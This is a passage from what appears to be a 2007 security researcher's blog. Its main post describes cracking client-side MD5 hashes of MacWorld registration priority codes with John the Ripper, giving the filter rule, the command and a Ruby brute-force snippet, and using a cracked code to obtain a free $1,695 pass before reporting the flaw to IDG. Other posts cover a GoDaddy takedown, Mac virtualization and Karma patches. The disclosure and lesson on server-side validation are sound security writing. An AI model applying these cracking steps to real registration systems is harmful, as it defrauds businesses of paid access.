Something is seriously wrong here. Are we so afraid that we shoot first and ask questions later? This isn't DMCA here, this is simple bullying and hiding behind "Terms of Service" wording. I think Fyodor has a strong legal case against GoDaddy and Fox for this action but since he charges no money it might be difficult to show any damages. Of course I'm no lawyer and live in Berkeley so take it as you will.. :)

There have been other cases, mostly against 'whistleblower' sites and blogs, of strong-arm tactics being used against somebody who can't fight back. Scientology and the Internet have a very rocky history for example. Had Fox simply sent an e-mail to Fyodor he would have probably removed it or heavily modified it to be of no use. I'm just guessing here.

The cat is out of the bag on the list anyways (like OTIII already is). Mailing lists like Full Disclosure are sent to thousands of e-mail addresses so the good and the bad already have this information. By publicly posting the list the phishers have invalidated those accounts and brought to the public just how easy and troublesome phishing truly is. It's easy to find yourself caught because if it's done well you'll never know it happened.

Thursday, January 11, 2007

Your Free MacWorld Expo Platinum Pass (valued at $1,695)

Happy new year everybody! Here's a little secret for web developers: client-side verification of user data is sometimes ok, but back it up with a server verification AND don't give important/secret stuff to the client.

I wanted to head over to MacWorld this week and obtained a "PC" code for a free Expo pass. That's cool and all but it doesn't get me access to see Jobs' keynote unless I sneak in. Plus if I got a regular badge I wouldn't have priority seating, something you really need since everyone and their goat flocks to hear Jobs say "One more thing..." But, alas, I'd only receive an Expo pass.

I plug in the register URL and start inserting my information. The second screen is where your Priority Code gets entered. Being the curious person I am I took a peek at the source code. Much to my chagrin I find this:


Well huh. These look like MD5 hashes. Let's look a little deeper in the code. On line 2515 there's a javascript function named "check_password" which is called any time the Priority Code field changes. Let's see what it does:
  1. Convert the cleartext to upper-case and strip invalid characters
  2. Calculate the MD5 of the new cleartext
  3. Check the list of valid_codes for the MD5(cleartext)
  4. Pop an alert box if the code isn't found
So what we need to do is crack the MD5 passwords with what we know about our keyspace: All upper case, most likely keyboard ASCII characters and numbers only. We can probably rule out non-printable ASCII so now we're just looking at A-Z0-9. Just an educated guess.
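As an added example (my own code, not the registration page's JavaScript and not the John run below), here is the four-step check_password logic rebuilt in Ruby together with the keyspace walk the paragraph above reasons about, which is the whole argument for why hashing the codes before shipping them to the browser protects nothing. The "valid codes" list is constructed from three made-up priority codes; the real list is not reproduced here.

```ruby
# Added example, not the page's JavaScript: check_password rebuilt in Ruby,
# plus the keyspace walk that shows why a client-side MD5 list is no secret.
# SAMPLE_CODES is constructed from made-up codes, not the real valid_codes.
require 'digest/md5'
require 'set'

ALPHABET = (('A'..'Z').to_a + ('0'..'9').to_a).freeze

# Steps 1-2: upper-case the input and drop anything outside A-Z0-9.
def normalize_code(raw)
  raw.upcase.gsub(/[^A-Z0-9]/, '')
end

# Steps 3-4: the client-side lookup, MD5(normalized) against the shipped list.
# A false return is where the page pops its alert box.
def client_check(raw, valid_hashes)
  valid_hashes.include?(Digest::MD5.hexdigest(normalize_code(raw)))
end

# Constructed stand-in for the page's valid_codes array.
SAMPLE_CODES = %w[PC QA1 X9Z].map { |c| Digest::MD5.hexdigest(c) }.freeze

# Walk the keyspace the post describes (A-Z0-9, short codes) and return
# hash => plaintext for every entry recovered. Unsalted MD5 over 36 symbols
# is 36**n guesses for length n, so codes of the lengths used here fall in
# well under a second; the 10-second John run below is the same arithmetic
# applied to the page's 897 hashes.
def crack_codes(valid_hashes, max_len: 3, alphabet: ALPHABET)
  remaining = Set.new(valid_hashes)
  found = {}
  (1..max_len).each do |len|
    alphabet.repeated_permutation(len).each do |chars|
      break if remaining.empty?
      guess = chars.join
      h = Digest::MD5.hexdigest(guess)
      found[h] = guess if remaining.delete?(h)
    end
  end
  found
end

if __FILE__ == $0
  crack_codes(SAMPLE_CODES).each { |h, code| puts "#{code}:#{h}" }
end
```

The fix the post arrives at further down applies unchanged here: keep the table on the server, have the client submit only the code it was given, and answer with the entitlement rather than the list; a long random code does the rest, since 36**n only helps when n is large and the hashes never leave the server anyway.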

A quick conversion of the javascript to "code#:md5hash" and a quick addition to John The Ripper's rules:

[List.External:AlNum_Upper]
void filter()
{
    int i, c;

    i = 0;
    while (c = word[i]) {
        /* reject anything outside a-z0-9 */
        if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
            word = 0; return;
        } else {
            /* convert to uppercase */
            if (c >= 'a' && c <= 'z') word[i] &= 0xDF;
        }
        i++;
    }
}


We begin the crack:
    $ john --format=raw-MD5 --incremental=alnum --external=alnum_upper macworld.codes
    Loaded 897 password hashes with no different salts (Raw MD5 [raw-md5])
    CREDIT (1183)
    guesses: 1 time: 0:00:00:09 c/s: 20372K trying: ADRY
Less than 10 seconds and I've already cracked a code that looks interesting. Let's see what we get:



A Platinum Pass for $0.00? Special line access to the Keynote! Alright!

So it looks like a combination of client-side authentication with all data being delivered to the end user. OWASP has a very good description of this vulnerability here. Ultimately you don't want to give the client everything they need to gain access to something they shouldn't. Validate on the server rather than the client and keep the keys secret. Of course you also shouldn't use a very easy key that will provide discounted access (CREDIT? Hmmmpf!)

But did it work? You need a government ID or credit card to receive your badge at the conference. Not a very hard thing to forge but no need to as I used my real initials. The badging people gave me an odd look at the pick-up window but everything matched and voila:


This was discovered and verified on Monday, 1/8/07 by picking up the above badge. On Tuesday I e-mailed IDG to report it and met with the web support team at MacWorld to say hi, hows it going, yeah this didn't take long to figure out, you gave me everything I needed to know in the code, etc. They're very nice people and were happy to discuss this issue and about web security in general. They'd spent most of the day looking back over their logs and found that others also had found this vulnerability and used it but I was the only one to report it.

Given what's mentioned in this article from CSO Online I can understand why that is. This experience helped me feel that it's not always a strong-arm, FBI jackbooted thug response for finding a web application vulnerability. Then again I only learned how to defraud a company of $1,695 (per instance) and didn't try to access a database containing credit cards, social security numbers, etc.

I made a video of the hack but it was after I talked to IDG so the final page doesn't show $0.00 anymore. Oh well, it'll give you the general idea of the vulnerability and how long it could take to figure out. As soon as it's finished I'll post it.

Wednesday, January 10, 2007

One platform to bind them...almost

This year was my first time going to the MacWorld Expo. My family has always had one form of a Macintosh ever since they were first introduced in 1985. Only recently did I finally purchase one for myself, primarily because I knew the shift to Intel processors would be a great big thing for all of computing.

That's become true because the wide gap between Windows and OSX has nearly been bridged:
  • Bootcamp allows running of Windows XP/Vista on Apple hardware
  • Parallels Workstation lets you run your Bootcamp XP/Vista partition (or any other OS) along with your OS X so application migration
  • CodeWeaver's Crossover Mac integrates their outstanding work with the WINE project to fill the gap where Parallels doesn't fit yet (No requirement to regularly support a Windows instance, gaming functionality, etc)
As a security professional I find myself having to use a lot of different operating systems regularly and to not have to lug around two or three laptops when I travel would be a tremendous boost to my own productivity, let alone my back. These products are starting to make this a reality.

Sure I use and dearly love VMWare, and they do have a beta version for the Intel Mac, but it's best to be able to stay in touch with the current trends. To be honest Apple makes visually and ergonomically sweet hardware. Their software still has some growing to do. (MOAB, Bastille)

There are still many features missing from both VMWare's and Parallels' OS X virtualization software. The main thing being SNAPSHOTS! Any vulnerability researcher worth their salt has at least XP, 2K and 2K3 VMWare snapshots with SP0, SP1, SP2, SP3, etc. Parallels says they'll have this Real Soon Now(tm) so I'm hoping for the best. I just dread having to rebuild my images as I'm sure they won't magically migrate.

The actual Expo wasn't anything special to me. Lots of iPod accessories, lots of external drive vendors, lots of bag vendors, bits and pieces of innovation here and there. Some very cool things here and there but other than Apple's iPhone I wasn't really blown away by anything.

Hello to IDG's web dev guys. You've got my name, e-mail and number - I'm sure you'll want to talk more after my next post. :)

Tuesday, January 09, 2007

MadWIFI and Karma update

The latest version of MadWIFI (0.9.2.1) does not work with the Karma patches I have. It's been on my list of things to get to but just haven't had the time to dedicate.